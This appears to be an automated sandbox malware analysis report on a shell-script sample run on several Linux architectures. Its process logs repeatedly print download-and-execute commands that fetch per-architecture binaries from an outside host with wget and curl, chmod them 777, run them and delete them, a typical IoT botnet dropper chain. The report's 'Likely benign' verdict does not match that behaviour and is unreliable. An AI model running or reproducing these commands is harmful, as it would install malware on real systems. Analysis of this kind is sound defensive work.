Malware Analysis Report

2024-10-16 06:09

Sample ID 240715-x2s8ssxhrc
Target 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.zip
SHA256 072a6dc8a7e9fb53b59013d0f1acd7e0f400e5ef77f264a7d4f85be4fde125c7
Tags
antivm
score
4/10

Analysis Overview

Threat Level: Likely benign

The file 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.zip was found to be: Likely benign.

Malicious Activity Summary

antivm

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-15 19:21

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:22

Platform

debian9-mipsel-20240418-en

Max time kernel

28s

Max time network

30s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/bin/chmod

[chmod 777 daddyl33tpiss.i486]

/tmp/daddyl33tpiss.i486

[./daddyl33tpiss.i486 Retard.i486.wget]

/bin/rm

[rm -rf daddyl33tpiss.i486]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/bin/chmod

[chmod 777 daddyl33tpiss.x86_64]

/tmp/daddyl33tpiss.x86_64

[./daddyl33tpiss.x86_64 Retard.x86_64.wget]

/bin/rm

[rm -rf daddyl33tpiss.x86_64]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/bin/chmod

[chmod 777 daddyl33tpiss.i586]

/tmp/daddyl33tpiss.i586

[./daddyl33tpiss.i586 Retard.i586.wget]

/bin/rm

[rm -rf daddyl33tpiss.i586]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/bin/chmod

[chmod 777 daddyl33tpiss.i686]

/tmp/daddyl33tpiss.i686

[./daddyl33tpiss.i686 Retard.i686.wget]

/bin/rm

[rm -rf daddyl33tpiss.i686]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/bin/chmod

[chmod 777 daddyl33tpiss.mips]

/tmp/daddyl33tpiss.mips

[./daddyl33tpiss.mips Retard.mips.wget]

/bin/rm

[rm -rf daddyl33tpiss.mips]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]

/bin/chmod

[chmod 777 daddyl33tpiss.mipsel]

/tmp/daddyl33tpiss.mipsel

[./daddyl33tpiss.mipsel Retard.mipsel.wget]

/bin/rm

[rm -rf daddyl33tpiss.mipsel]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]

/bin/chmod

[chmod 777 daddyl33tpiss.arm]

/tmp/daddyl33tpiss.arm

[./daddyl33tpiss.arm Retard.arm.wget]

/bin/rm

[rm -rf daddyl33tpiss.arm]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]

Network

Country Destination Domain Proto
US 1.1.1.1:53 aggressivepvp.cf udp

Files

/tmp/busybox

MD5 6ffc46165b5d9726a6607f3ea5305589
SHA1 ab127220f42e816b413dde0d17031e251a7bc98f
SHA256 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:21

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

13s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/tmp/busybox

MD5 b4dede5fc0b1bad5cb8e901bde126b97
SHA1 10cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256 a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA512 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:21

Platform

debian9-armhf-20240418-en

Max time kernel

18s

Max time network

3s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

Network

Country Destination Domain Proto
US 1.1.1.1:53 aggressivepvp.cf udp

Files

/tmp/busybox

MD5 e588bcf03ae78237b58899d35f50c570
SHA1 2194732ebbefbc27bdae876c77f2a97a20175710
SHA256 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:22

Platform

debian9-mipsbe-20240611-en

Max time kernel

24s

Max time network

26s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/bin/chmod

[chmod 777 daddyl33tpiss.i486]

/tmp/daddyl33tpiss.i486

[./daddyl33tpiss.i486 Retard.i486.wget]

/bin/rm

[rm -rf daddyl33tpiss.i486]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/bin/chmod

[chmod 777 daddyl33tpiss.x86_64]

/tmp/daddyl33tpiss.x86_64

[./daddyl33tpiss.x86_64 Retard.x86_64.wget]

/bin/rm

[rm -rf daddyl33tpiss.x86_64]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/bin/chmod

[chmod 777 daddyl33tpiss.i586]

/tmp/daddyl33tpiss.i586

[./daddyl33tpiss.i586 Retard.i586.wget]

/bin/rm

[rm -rf daddyl33tpiss.i586]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/bin/chmod

[chmod 777 daddyl33tpiss.i686]

/tmp/daddyl33tpiss.i686

[./daddyl33tpiss.i686 Retard.i686.wget]

/bin/rm

[rm -rf daddyl33tpiss.i686]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/bin/chmod

[chmod 777 daddyl33tpiss.mips]

/tmp/daddyl33tpiss.mips

[./daddyl33tpiss.mips Retard.mips.wget]

/bin/rm

[rm -rf daddyl33tpiss.mips]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]

Network

Country Destination Domain Proto
US 1.1.1.1:53 aggressivepvp.cf udp

Files

/tmp/busybox

MD5 a39fe8036e559ce804e26518061e59ff
SHA1 8df27f6e8a48b762d945ea2f2b87390c80acd4de
SHA256 3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38
SHA512 e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d